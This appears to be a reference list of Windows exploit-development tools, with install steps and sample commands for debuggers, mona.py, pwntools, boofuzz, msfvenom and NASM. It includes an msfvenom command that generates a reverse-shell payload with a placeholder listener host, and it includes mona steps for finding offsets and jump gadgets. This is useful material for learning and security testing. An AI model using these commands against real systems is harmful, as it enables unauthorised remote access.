Windows exploit development, custom shellcode, DEP/ASLR bypass.
Official PagePE file editor and analyzer
Download from github.com/hasherezade/pe-bearOpen PE binary, examine sections and importsWindows debugger with Python scripting
Download from immunityinc.comAttach to process; use mona.py commandsMicrosoft kernel and usermode debugger
Install via Windows SDKwindbg -g target.exeModern open-source Windows debugger
Download from x64dbg.comLoad .exe or attach to processPython plugin for Immunity automating exploit tasks
Copy to Immunity PyCommands folder!mona findmsp; !mona jmp -r esp; !mona bytearrayPython CTF and exploit framework
pip3 install pwntoolsfrom pwn import *; cyclic(200)Python network protocol fuzzer
pip3 install boofuzzs_initialize(); s_string("USER"); s_string("A"*1000, fuzz=True)Metasploit payload and shellcode generator
sudo apt install metasploit-frameworkmsfvenom -p windows/shell_reverse_tcp LHOST=x LPORT=4444 -f python -b "\x00"Netwide assembler for custom shellcode
sudo apt install nasmnasm -f win32 payload.asm -o payload.obj